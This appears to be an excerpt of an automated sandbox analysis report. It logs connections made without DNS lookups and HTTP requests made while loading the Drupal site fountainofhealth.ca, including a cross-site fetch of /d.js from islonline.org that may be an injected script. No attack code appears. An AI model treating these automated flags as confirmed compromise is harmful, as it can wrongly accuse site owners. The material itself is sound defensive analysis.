                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 172.202.163.200
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknownTCP traffic detected without corresponding DNS query: 184.86.251.25
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.123.128.14
                                  Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.203
                                  Source: unknownTCP traffic detected without corresponding DNS query: 51.132.193.104
                                  Source: unknownTCP traffic detected without corresponding DNS query: 2.17.190.73
                                  Source: unknownTCP traffic detected without corresponding DNS query: 52.109.28.46
                                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /en HTTP/1.1Host: fountainofhealth.caConnection: keep-aliveUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentsec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Accept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /modules/ajax_loader/css/throbber-general.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/views/css/views-responsive-grid.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/core.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/controlgroup.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/resizable.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/checkboxradio.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/button.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/dialog.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/align.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/fieldgroup.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /npm/@unicorn-fail/drupal-bootstrap-styles@0.0.2/dist/3.4.0/8.x-3.x/drupal-bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/container-inline.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/clearfix.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/details.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/hidden.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/item-list.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/js.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/nowrap.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/position-container.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/progress.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/reset-appearance.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/css/bootstrap.css HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: text/css,*/*;q=0.1sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: stylereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=0
                                  Source: global trafficHTTP traffic detected: GET /npm/bootstrap@3.4.1/dist/js/bootstrap.js HTTP/1.1host: cdn.jsdelivr.netorigin: https://fountainofhealth.casec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: scriptreferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=2
                                  Source: global trafficHTTP traffic detected: GET /d.js HTTP/1.1host: islonline.orgsec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0accept: */*sec-fetch-site: cross-sitesec-fetch-mode: no-corssec-fetch-dest: scriptsec-fetch-storage-access: activereferer: https://fountainofhealth.ca/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/resize.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/sticky-header.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/system-status-counter.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/system-status-report-counters.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/system-status-report-general-info.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/tablesort.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/system/css/components/tree-child.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/views/css/views.module.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/modules/ckeditor5/css/ckeditor5.dialog.fix.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /modules/views_slideshow/modules/views_slideshow_cycle/css/views_slideshow_cycle.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
                                  Source: global trafficHTTP traffic detected: GET /core/assets/vendor/jquery.ui/themes/base/theme.css?swjs7b HTTP/1.1Host: fountainofhealth.caConnection: keep-alivesec-ch-ua-platform: "Windows"User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"sec-ch-ua-mobile: ?0Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://fountainofhealth.ca/enAccept-Encoding: gzip, deflate, br, zstdAccept-Language: en-US,en;q=0.9
